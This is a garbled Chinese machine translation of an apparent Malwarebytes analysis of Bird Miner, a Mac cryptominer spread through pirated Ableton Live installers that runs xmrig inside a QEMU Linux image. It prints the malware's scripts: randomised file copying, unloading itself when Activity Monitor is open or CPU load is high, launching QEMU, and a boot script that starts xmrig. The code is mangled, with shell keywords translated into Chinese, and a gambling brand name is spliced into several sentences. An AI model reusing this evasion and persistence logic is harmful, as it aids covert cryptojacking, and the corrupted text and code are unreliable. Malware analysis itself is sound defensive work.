新的Mac cryptominer Ma必威平台APPlwarebytes通过模拟Linux检测到Bird Miner运行

在高端音乐制作软件Ableton Live的安装程序中发现了一必威平台APP个新的Mac加密货币矿工Malwarebytes检测为Bird miner。该软件是DJ现场表演的工具，也是作曲、录音、混音和掌握音乐的工具。虽然加密挖掘在Mac上并不新鲜，但它有一个独特的转折点：它通过Linux仿真运行。

商行为

Ableton Live 10破解安装程序可以从盗版网站VST Crack下载，容量超过2.6 GB;这个大小可能会引起其他程序的警告，但对这样的应用程序来说是合理的。然而，仔细检查，很明显这个安装程序正在做一些奇怪的事情。例如，Bird Miner的postinstall脚本会将一些已安装的文件随机复制到新的位置:

#RANDOM z1=“$（/Users/Shared/randwd Software）”z11=“$（/Users/Shared/randwd）”z111=“$（/Users/Shared/randwd）”z2=“$（/Users/Shared/randwd Software）”z22=“$（/Users/Shared/randwd）”z2222=“$（/Users/Shared/randwd）”z3=“$（/Users/Shared/randwd）”z33=“$（/Users/Shared/randwd）”z3333=“$（/Users/Shared/randwd）”#创建目录mkdir/Library/Application\Support/$z1 mkdir/Library/Application\Support/$z2#移动程序cp/Users/Shared/z1/usr/local/bin/$z1 cp/Users/Shared/z1.daemon/Library/Application\Support/$z1/$z11 cp/Users/Shared/z1/usr/local/bin/$z2 cp/Users/Shared/z1.daemon/Library/Application\Support/$z2/$z22 cp/Users/Shared/z1.qcow2/Library/Application\Support/$z2/$z222

这段代码使用randwd脚本，放置在安装过程中，从单词列表生成随机名称:

/usr/share/dict/web2' TMP_FILE=$(mktemp -t WORDLIST)[…]) #允许用户通过最初的特色发电机grep - e ' ^[[:上:]]' $ {WORDLIST} | grep ev的纳粹主义纳粹| |希特勒主义”> $ {TMP_FILE} WORDLIST = $ {TMP_FILE} #使用记录来生成随机数的文件提取sed - n(记- r 1 1美元(wc - l < $ {WORDLIST})) p $ {WORDLIST}

有趣的是，恶意软件似乎想要避免任何关于纳粹或希特勒的词，这些词实际上可以在单词列表中找到。我想即使是恶意软件的开发者也不想和这些术语扯上关系。然而，编写过滤器的人并不真正理解正则表达式将匹配什么，因为它比需要的长。

系统中随机丢弃的文件具有多种功能。三个是启动守护进程，负责启动三个不同的shell脚本。

其中一个启动的脚本名为Crax，它安装在/usr/local/bin/目录中。Crax的任务是确保恶意软件不会被讨厌的安全研究人员窥探。它所做的第一件事是检查Activity Monitor是否正在运行，如果正在运行，则卸载其他进程。

pgrep "Activity Monitor" if [$?情商0);然后launchctl卸载-w /Library/LaunchDaemons/com.Flagellariaceae。plist launchctl卸载-w /Library/LaunchDaemons/com.Dailplist其他

如果活动监视器未运行，则恶意软件将进行一系列CPU使用检查。如果结果显示，它将CPU锁定在85%以上，它将再次卸载所有内容。

A= ' ioreg -c IOHIDSystem | awk '/HIDIdleTime/ {print $NF/1000000000;exit}' ' B= ' echo $A / 1 |bc ' if [$B -lt 120]; / /返回$A / 1 |bc '然后T= ' ps -A -o %cpu | awk '{s+=$1} END {print s}' ' C= ' sysctl hw. txt ';logicalcpu |awk '{print $2}' ' D= ' echo $T / $C |bc ' if [$D -gt 85]; / /输出然后T= ' ps -A -o %cpu | awk '{s+=$1} END {print s}' ' C= ' sysctl hw. txt ';logicalcpu |awk '{print $2}' ' D= ' echo $T / $C |bc ' if [$D -gt 85]; / /输出然后T= ' ps -A -o %cpu | awk '{s+=$1} END {print s}' ' C= ' sysctl hw. txt ';logicalcpu |awk '{print $2}' ' D= ' echo $T / $C |bc ' if [$D -gt 85]; / /输出然后launchctl卸载-w /Library/LaunchDaemons/com.Flagellariaceae。plist launchctl卸载-w /Library/LaunchDaemons/com.DailPlist fi fi fi else

如果所有这些检查都通过，它将加载其他两个进程的守护进程。在我们的例子中，这些是com。鞭毛科。plist，它运行一个名为Pecora的脚本，com.Dail。plist运行一个名为Krugerite的脚本。

有趣的是，这两个脚本几乎完全相同，并且每个脚本加载一个单独的可执行文件，如下面的Krugerite脚本所示。

＃！/bin/bash function start {pgrep "Activity Monitor" if [$?情商0);然后launchctl卸载-w /Library/LaunchDaemons/com.Dail。plist其他/usr/local/bin/Nigel -M accel=hvf --cpu host /Library/Application\ Support/Nigel/Poaceae -display none fi } start;

此脚本再次检查活动监视器，并在其运行时退出，表明有人正在监视异常的处理器活动。如果未打开，则启动名为Nigel的可执行文件，并将另一个文件Poaceae的路径作为参数传递。

这就是事情变得有趣的地方。事实证明，Nigel文件（以及另一个脚本的对应文件）是一个名为Qemu的开源软件的旧版本。

Qemu是一种开源仿真器，有点像只支持命令行的VirtualBox，它能够在非Linux系统上运行Linux可执行文件。Qemu的这些副本用于运行上面示例中名为Poaceae的图像文件的内容，使用Apple的Hypervisor框架以获得更好的性能。

最后一块拼图在Poaceae文件中。这个文件是一个QEMU QCOW映像文件:

测试$ file /Users/test/Library/Application\ Support/Nigel/Poaceae /Users/test/Library/Application Support/Nigel/Poaceae: QEMU QCOW Image (v3)， 527400960 bytes

这是一种文件格式，有点类似于苹果的磁盘映像（.dmg）格式，但特定于Qemu，不容易打开。然而，通过一些工作，可以窥视禾本科的内部文件。在本例中，映像包含一个可引导的Linux系统。它使用的Linux的具体变体是微型内核。

该图像还包含一个mydata.tgz文件，在上面的屏幕截图中引用，用于在启动时加载某些文件。其中一个文件是/opt/bootlocal.sh，它包含在微型核心系统启动时运行的命令。在本例中，bootlocal.sh文件包含启动和运行xmrig的命令。

＃！/bin/sh #将其他系统启动命令/mnt/sda1/tools/bin/idgenerator 2>&1 > /dev/null /mnt/sda1/tools/bin/xmrig_update 2>&1 > /dev/null /mnt/sda1/tools/bin/ command_update 2>&1 > /dev/null /mnt/sda1/tools/bin/ccommand 2>&1 > /dev/null /mnt/sda1/tools/bin/ xmrrig

因此，一旦Tiny Core系统启动，xmrig无需用户登录就能启动。当系统显示在上面的截图要求“框登录”，矿工已经在运行。

xrig软件最近被Mac的加密人员滥用了很多次，比如DarthMiner. 然而，Bird Miner是一个有趣的例子，因为这里使用的xmrig副本是通过Qemu在仿真中运行的Linux可执行文件。

分布

该恶意软件最初是在一个盗版的Ableton Live 10安装程序中发现的。从那时起，我们找到了Bird Miner的其他安装程序，这些安装程序都是通过同一个站点分发给其他软件的。所有这些安装程序都会删除相同的恶意软件，尽管具体的安装过程可能略有不同。

然而，Reddit上一个讨论VST破解网站安全性的盗版帖子透露，该网站以某种形式传播这种恶意软件至少已有4个月，可能更久。

果然，在VirusTotal上发现了一些使用相同技术的旧安装程序，但还没有使用随机文件名。

影响

Bird Miner恶意软件有点隐蔽，因为如果Activity Monitor正在运行，它会在多个点跳出，并且通过将Miner代码隐藏在Qemu图像中，有效地混淆了Miner代码。

然而，它也在暗中攻击自己，使用相当明显的启动守护进程进行持久化，并使用shell脚本启动一切。这些事情不会揭示恶意软件的意图，但对一个精明的用户来说，很容易注意到一些可疑的事情正在发生。

更有趣的是，恶意软件是通过仿真运行的，而它本可以很容易地作为本地代码运行。这将给恶意软件更好的性能和更小的占用空间。此外，恶意软件运行两个独立的挖掘者，每个挖掘者都从自己的130mb Qemu映像文件运行，这意味着恶意软件消耗的资源远远超过必要的。

Bird Miner以这种方式创建的事实可能表明作者可能熟悉Linux，但对macOS不是特别精通。尽管这种方法确实混淆了矿机本身，这可能有助于恶意软件逃避检测，但这种好处被依赖shell脚本和在模拟中同时运行不是一个而是两个矿机的沉重占用空间所抵消。

显然，这个恶意软件提供了一个可靠的例子，说明为什么盗版不是一个好主意。如果你从事盗版，你很可能被感染，即使安装了杀毒软件。就像桥上的栏杆一样，防病毒软件可以保护你，但如果你积极地越轨和从事危险的行为，它的效果就差得多。

必威平台APPMac恶意软件探测到这个恶意软件为OSX。BirdMiner.

IOCs

/usr/local/bin/Crax:3dca4365b5ea280b966541d53eaee665e2b915a668dd34a1ae208595bc83dbda
/usr/local/bin/Nigel: 5 c314b493d6ad5df84450e190b94a9ff67e79ca125a322a65b465ee171b6e638
/图书馆/应用支持/尼/ Krugerite: 390 e9a6d4a6f6c9a553aaa6543058931d14cfdc2620732bbfac73fd90eaf09ee
/库/应用程序支持/奈杰尔/禾本科：7e36222a3e3898d9473f017c33c803ad70878fa79f391a65d87ae061cb89fba7
最小的安装器之一:dfbe4d61118aef6464a2fe17cbf882d4a0f3fdb81e58d99aa7114a553b42a66d